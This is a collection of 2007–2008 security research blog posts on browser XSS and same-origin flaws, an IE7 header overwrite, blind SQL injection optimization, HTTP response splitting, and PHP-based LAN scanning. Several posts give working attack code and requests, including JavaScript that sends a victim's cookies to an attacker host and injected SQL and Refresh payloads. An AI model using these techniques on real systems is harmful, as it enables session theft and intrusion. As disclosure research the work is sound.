My Security Planet » Security Thoughts

Security Thoughts

All-In-One MultiStage Js/Html Payload

Posted: November 4th, 2008, 2:25pm CST

Tags: [edit]

I'm a bit lazy sometime.
For instance, when I have to create two files in order to exploit^N^N^N^N^N^Nshow some kind of multi stage vulnerability,
and I'd need to write two files, one for the Html and one for the Js.
So I thought, how could I overcome with all this (incredible) effort?

Let's think about my previous post , when I released the Opera historysearch q=*Xss proof of concept.
Maybe (or maybe not) someone noticed some difference between standard Pocs and the Poc itself.

It is a self contained Html/Js Poc, even if it is a two stage exploit.

Let's see a simpler empty example:


<html>
[Html Here]
</html>


As it could be seen it uses comments in order to be interpreted in different contexts, the Js one when loaded by
<script src='self.html'></script>
and the Html context when loaded from the browser.

The first comment is for Html:



that will prevent the Html interpreter to display junk allowing to write Html in a straight forward style.

The second comment is for the JavaScript one:

/* Html payload Starts here
-->
<html>
<body style='background-color: rgb(220,220,220)'>
...
<!--
Html payload Ends here */

which will prevent the Js interpreter to raise an exception.
It's multiple browser compliant, and it doesn't need to be a E4X browser compliant.

Q: So...when I am supposed to use it?
A:It could be used for milworm p0cs or instead of publishing/posting on FD/BGTQ/SEC_ML those boring multiple files.
Q:Why are you so lazy?
A:Hey...Too many questions.

Yes, it's probably useless, but it reminds me some of those multilanguage/multiprocessor/multi_O-S shellcodes (with all due respect) that has been published on phrack.
Finally, that's more an excercise in style than a real groundbreaking new way of doing POCs, but I thought it was worth posting about it.
However any comments will be appreciated.
Melomania

Posted: November 4th, 2008, 5:47am CST

Tags: [edit]

Some days ago there has been a bit of movement in the security scene since Opera 9.61 was released.
Thanks to Roberto Suggi Liverani that pointed out an issue on Opera historysearch feature and to Kuza55
for asking if the problem, initially considered as "simple" data stealing, could lead to a command execution,
I started thinking about the analogies with chrome Firefox implementation.

After some lazy testing, I figured out that same origin iframe technique could be used in order to exploit the
Xss, leveraging it to Js driven configuration change.
Why?
Because when dealing with opera:* features the browser, in the context of same origin policy, considered
the SOP matching as follows.

Since SOP matching is evaluated by comparing

scheme1 + host1 + port1 == scheme2 + host2 + port2

We got opera:* considered as:

opera + null + null

For every opera:* feature.

So by injecting an iframe from opera:historysearch and pointing to opera:config there was a match in the SOP.

That is the real issue.

Well, not really, that is only one of the hypotesis that have to be satisfied in order to lead to automatic command
execution.
The very first and interesting issue was the CSRF to opera:* location allowed using the window.open Js method
from a http: scheme protocol, and that has to be credited to Roberto Suggi Liverani for finding that.

The rest of the history is quite straightforward.

After the issue found by Roberto I started to play a bit with the historysearch feature parameters.
And it resulted in a very simple attribute-escaping-injection in the next-previous Xss.
So by pointing the browser to:

opera:historysearch?q=">payload&p=1&s=1

there was the chance to exploit once again the opera:* scheme, but just if some result in the historysearch
page was found.

That's why the payload needs to be in the attacker evil page.

The only problem was that '/' could not be used because of Opera's way of encoding/decoding them.

Double urlencoding came into help. The solution was using %%32f in spite of %2f.
(Avif Raff's came up with '<image src=x onerror=Payload' solution)

And that's the full Poc.

So, another new "chrome" alike interface to be abused? Maybe.
What is for sure is that when a browser adds new local functionalities accessible to the user, dressed as
internal_scheme: with html page and internal Js methods, well, security should be taken very seriously by doing:

0. Research in the history of other browsers' flaws;
1. Risk Assessment in the design phase;
2. Threat analysis and Abuse Cases Analysis in the design phase;
3. Secure Code Review of the new features;
4. Black Box Penetration Testing.

And that's where Opera missed its chance.
We all hope they learnt something from their history(search).

Now I can say that I'm a melomaniac again.
More on MSA02240108 IE7 Header Overwrite

Posted: March 21st, 2008, 2:59pm CDT

Tags: [edit]
When I was researching ways exploit MSA02240108 'Microsoft Internet Explorer allows overwriting of several headers leading to Http request Splitting and smuggling', one of the interesting exploits I've found is that by taking advantage of XHR redirect feature in IE7, header stealing is possible also from an attacker site.

Let's see how:
When dealing with a XMLHttpRequest, Internet Explorer 7 follows redirect also on external urls.
Moreover, every added header is sent to the latter request as well.
Infact,
var x=new XMLHttpRequest(); x.open("POST","/page.html?redirect=http://anotherhost.tld"); x.setRequestHeader("Blah","Blah2"); x.onreadystatechange=function (){ if (x.readyState == 4){ alert(x.responseText) } } x.send("blah");
is executed and generates the following HTTP traffic:

GET /page.html?redirect=http://anotherhost.tld HTTP/1.1 Cookie: SomeCookie_to_ahost.tld Host: ahost.tld Blah: Blah2 HTTP/1.1 302 Moved Temporarily Location: http://anotherhost.tld Content-lenght: 0 GET / HTTP/1.1 Cookie: SomeCookie_to_anotherhost.tld Host: anotherhost.tld Blah: Blah2 <-- IE Sends it to anotherhost too! HTTP/1.1 200 OK ... <html> Body that will never be accessible from a XMLHttpRequest originating from another host. </html>

but of course x.responseText is empty.

Now, let's suppose there's a victim host vhosted on the same server of an attacker site.

var x=new XMLHttpRequest(); x.open("POST","/index.html"); x.setRequestHeader("Host"+String.fromCharCode(223),"http://at.tacker.com"); x.setRequestHeader("Connection","keep-alive"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } x.send("blah");

where index.html simply redirect with:

HTTP/1.1 302 Moved Temporarily Location: http://vi.ct.im/victimpage.html

The overwritten Host header will still be there on the redirected request because IE7 considers it as an additional header, but every other header will be as if the request is to vi.ct.im host.

GET /victimpage.html HTTP/1.1 Host: at.tacker.com Cookie: some_cookie_that_should_be_sent_to_vi.ct.im Header1: some_value1_that_should_be_sent_to_vi.ct.im Header2: some_value2_that_should_be_sent_to_vi.ct.im Header3: some_value3_that_should_be_sent_to_vi.ct.im
Which will be sent to the server. The server sees the Host: at.tacker.com header and sends the whole request to it, letting the cookie and other sensitive data in headers, to be directly stealed by at.ttacker.com.

Now my question is:
Why following a redirect to external hosts since the response could not be get from javascript, because of
Same Origin Policy?
...
Just to introduce some other potential security issue?
The first release of SWFIntruder is out!!

Posted: December 4th, 2007, 11:10am CST

Tags: [edit]

I am proud to announce first release of SWFIntruder.
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically developed for analyzing and testing security of Flash applications at runtime.
It helps to find flaws in Flash applications using the methodology originally described in Testing Flash Applications and in Finding Vulnerabilities in Flash Applications.

Some neat feature:

* Basic predefined attack patterns.
* Highly customizable attacks.
* Highly customizable undefined variables.
* Semi automated Xss check.
* User configurable internal parameters.
* Log Window for debugging and tracking.
* History of latest 5 tested SWF files.
* ActionScript Objects runtime explorer in tree view.
* Persistent Configuration and Layout.

SWFIntruder is hosted @ OWASP and is sponsored by Minded Security.

Check it out and let me know!
Any comments will be appreciated.
Finding Vulnerabilities in Flash Applications - Slides @ Owasp

Posted: December 4th, 2007, 10:42am CST

Tags: [edit]

Finally the slides of my presentation @ WASC & OWASP AppSec 2007 are available for everyone is interested on this topic.
It's the second chapter of my personal research about Flash Application security testing.
Some new trick is disclosed and a couple of video screencasts are now available to respectively show how a flawed SWF could XSS the hosting site, and a preview of the tool I am going to release today on behalf of Minded Security for SWF security analysis and testing at runtime.
I hope you'll enjoy reading it!
ExploitMe Tools - A Little Warning

Posted: December 3rd, 2007, 3:21pm CST

Tags: [edit]
Few days ago two interesting new tools were released and donated to the sec-community, XSSMe and SQLiMe by Security Compass.
From securitcompass.com site:
```
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS) vulnerabilities.

What is Exploit-Me?

A suite of Firefox web application security testing tools. 

Exploit-Me tools are designed to be lightweight and easy to use. 

Instead of using proxy tools like many web application testing tools, Exploit-Me integrates directly

with Firefox.
```
Ok. This is the good tale about it.

The problem is that XSSMe attack patterns use as external source www.securitycompass .com:

<SCRIPT a=">'>" SRC="http://www.securitycompass.com/xss.js"> </SCRIPT>

and this should not happen, or, at least XssMe should ask the user to change www.securitycompass.com to a custom server.
Why? Because if you're doing some Ethical Hacking activity using XssMe for automated testing, whenever the victim host would have a Xss, www.securitycompass.com web server would get a request like the following:

GET /xss.js HTTP/1.1
Host: www.securitycompass.com
User-Agent: Firefox/2.0.0.11
Connection: keep-alive
Referer: http://vi.ct.im/flawedPage.jsp

Do you see? The referrer header is a great resource for statistics, and supposing you're doing the testing under some NDA you're almost screwed.

So in order to resolve this issue, i exported the xss attacks to xml, replaced to my local server, deleted every pattern from the option dialog and imported the replaced xss.xml.
Even though I really think this was due to an oversight, if anyone intends to use XssMe, fix it by yourself, or use it at your own risk!

FAQ:
Q: Did you reported this issue to Security Compass?
A: Yes. They added a known issues link with the description of the problem.
Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)

Posted: November 5th, 2007, 4:54pm CST

Tags: [edit]
Today my colleague Giorgio Fedon of Minded Security, talked me about an idea regarding how to save bandwidth while exploiting blind SQL Injection.
His question was:

"When a pentester is trying to get the content of a DB by exploiting a blind injection how can s/he get the content-length header without effectively getting all
the response body, so that s/he can save time and bandwidth?"

My answer was: "use HEAD! (in both senses :)"
It came out that RFC says it's not possible to use it.
Infact, Apache doesn't satisfy a HEAD request with Content-Length header in response.

HEAD /index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*

HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:00:07 GMT
Server: Apache
Content-Type: text/html

See? no Content-Length in response even if my localhost home page is 90 bytes long (as Rfc suggests).
Let's try it with Range header:

GET /index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Range: bytes=-1

HTTP/1.1 206 Partial Content
Date: Mon, 05 Nov 2007 21:03:15 GMT
Server: Apache
Content-Range: bytes 89-89/90
Content-Length: 1
Content-Type: text/html

Ahhhh, so the Range header in a request will fullfill my request without sending me the whole body but with a Content-Range which shows me how big would be the body itself.

Unfortunately, not all Web Servers acts the same.
IIS 6.0 doesn't follow HTTP 1.1 Rfc and simply sends the whole body in response to GET or POST requests.
But..Yes there is a but.
HEAD requests are fullfilled with the right Content-Length:

HEAD /search.aspx HTTP/1.1
Host: 127.0.0.1
Accept: */*
Content-Length: 22

search=all'+AND+'1'='1

HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4790
Content-Type: text/html
Expires: Mon, 05 Nov 2007 21:14:00 GMT
Set-Cookie: ASPSESSIONIDSQTCRTQA=XXXXXXXXXXXXXXXXXXX; path=/
Cache-control: private

This means that we get the length of the response body even when there's no body in response.

How to use these infos?
By improving blind sql injection tools.

Often blind sql injection tools use the differences in response bodies to understand if the sql injection accomplishes a true or false response.
Using Content-Length or Content-Range could improve performances a lot.

The following look up table is for server and method:
```
SERVER      METHOD   RANGE



IIS 6.0      HEAD

APACHE       GET/POST  X

IBM HTTP     GET/POST  X

WEBSPHERE    GET/POST  X
```
We (me and Giorgio) hope some reader will provide informations about other web servers.
HTTP Response Splitting and Data: URI scheme in Firefox

Posted: November 1st, 2007, 6:29pm CDT

Tags: [edit]

After having read Pdp's point of view about data: uri scheme on Firefox, here's another reason why Mozillla developers should stop propagating data uri to the initiating parent site.

It is known that Meta Http-equiv='Refresh' tag could be exploited to inject javascript using data:.
It's also known that Refresh is a Http header and that it has security matters as clearly explained by Amit Klein.
By taking all these stuff together, it will result that Http Response Splitting, could be used to inject Refresh: header and directly XSS the redirecting site.
Let's suppose there's a redirection on example.com which acts like the following:

GET /redirect.jsp?redir=http:// spamsite. com HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: [http:] spamsite. com
Transfer-Encoding: chunked
Content-Type: text/html

In case this script also suffers from a Http Response Splitting, an attacker could easily inject Refresh: with data: uri.

GET /redirect.jsp?redir=data:blah%0aRefresh:+0%3b+url%3ddata:text/html%3b,<script>js</script> HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: data:blah
Refresh: 0; url=data:text/html;,<script>js</script>
Transfer-Encoding: chunked
Content-Type: text/html

Firefox will happily execute it in the context of the redirector.
Optimizing the number of requests in blind SQL injection

Posted: October 5th, 2007, 12:47pm CDT

Tags: [edit]

Blind injection is often considered as an On/Off binary research accomplished using the bisection algorithm.
When the bisection algorithm is applied the complexity is O(Log2 n) where n is in the case of the extended ASCII character set is 255.
So for each character at a given position 'p' the total number of requests will be:

Log2 n = Log2 255 = ~7

So if the lenght of the information to be retrieved is 8,
the total number of requests to be sent is

8 * Log2 255 = 56

Let's suppose now, there is the following situation:

http://vi.ctim/page.jsp?id=1

where page.jsp is a script which loads dinamically content by using the SQL query:

qry= "Select content from pages where id="+Request.value("id");

Let's suppose the rest of the application gives no clue about SQL errors or the possibility to use other tricks in order to force the web application to display the informations we want.
This is a classical Blind SQL Injection case.

But what happens if by changing 'id' values results displaying different pages?

The attacker could use the different responses in order to map the results of an injected conditional sql statement.

That is.
Let's suppose there are more than 255 values for the 'id' parameter

"http:// vi.ctim/page.jsp?id=1"
"http:// vi.ctim/page.jsp?id=2"
...
"http://vi.ctim/page.jsp?id=255"

then let's map every single snippet of unique text content for every request.
Then by setting

For (pos = 1; pos<LEN(@@version)){
idval="(CASE substr(@@version,"+pos+",1)
   when char(1) then 1
   when char(2) then 2
   when char(3) then 3
   when char(4) then 4
   when char(4) then 5
   etc
   end )"
get response for:
"http://vi.ctim/page.jsp?id=idval"
}

the attacker will have to accomplish only

LEN(@@version)

requests, because for every request the application will return the page mapped to the character value.

Now, this is the best case.
For every character value exists a single id value.

There could be a number of id values which is less than 255
(or # printable chars for non binary information).

Let's suppose there exist only 4 unique id values corresponding to 4 unique responses.
Then the injected query will be (in pseudo code):

res=substr(@@version,pos,1);

if(res>191 and res   then 1
else if(res>127 and res   then 2
else if(res>63 and res   then 3
else
    4

For each result, the set of values we are analysing will be 1/4 of the previous set.

This algorithm has O(Log4 255), which will correspond to

LEN*Log4 255 = LEN*3.9

requests to be sent.

The worst case is the On/Off bisection algorithm already described in several papers.

I don't have the time to implement it now, but I hope to see some tool with this (maybe) new approach in it:)
Scanning internal Lan with PHP remote file opening.

Posted: August 29th, 2007, 12:24pm CDT

Tags: [edit]

Even if some website is still vulnerable to remote file inclusion (RFI), this is becoming a quite rare scenery.
Nonetheless, much more often it happens that some of the php functions allowing http or ftp protocol wrappers are exposed to user control.
A perfect example for this tecnique is a fully controlled getsizeimage() function with allow_url_fopen.
No RFI, no data returned, it could be just used for DoS.

<?
getimagesize($_GET['image']);
...
?>

Obviously there's no RFI, and until yesterday probably nobody would care about check,inspect or exploit it. This article explains that some kind of attack could still be accomplished:

Lan scanning and Drive by Pharming with error matching or time analisys.

If the php error display is set to On, a simple request like:

[victim.ltd]

will display:

Warning: getimagesize(http://127.0.0.1:22/check): failed to open stream:
Connection refused in...

This means it's a closed port.

Indeed, an open port will be displayed as:

Warning: getimagesize(http://127.0.0.1:22): failed to open stream:
HTTP request failed!...

ftp :// protocol could obviously be used, too.

If there's no error on output, timing attacks could be accomplished too.

Infact we could get timing result if a port is closed:
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check

real 0m0.057s
user 0m0.032s
sys 0m0.020s

Or if a port is opened :
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check

real 0m5.095s
user 0m0.032s
sys 0m0.020s

----
So, what can be done?

If the right conditions are satisfied:
1. Drive By Pharming
2. Bruteforcing routers.
3. Full Lan Scan.

Last, Ascii wrote a nice php script for Lan Scan.
You can find it here...

Ah... did I mentioned that php remote file supports HTTP Basic Authentication? :)

As usual, the next move is up to you

← PHP Security Blog Sunnet Beskerming Security Advisories →

My Security Planet » Security Thoughts

Feeds

Security Thoughts

Posted: November 4th, 2008, 2:25pm CST

Tags: [edit]

Posted: November 4th, 2008, 5:47am CST

Tags: [edit]

Posted: March 21st, 2008, 2:59pm CDT

Tags: [edit]

Posted: December 4th, 2007, 11:10am CST

Tags: [edit]

Posted: December 4th, 2007, 10:42am CST

Tags: [edit]

Posted: December 3rd, 2007, 3:21pm CST

Tags: [edit]

Posted: November 5th, 2007, 4:54pm CST

Tags: [edit]

Posted: November 1st, 2007, 6:29pm CDT

Tags: [edit]

Posted: October 5th, 2007, 12:47pm CDT

Tags: [edit]

Posted: August 29th, 2007, 12:24pm CDT

Tags: [edit]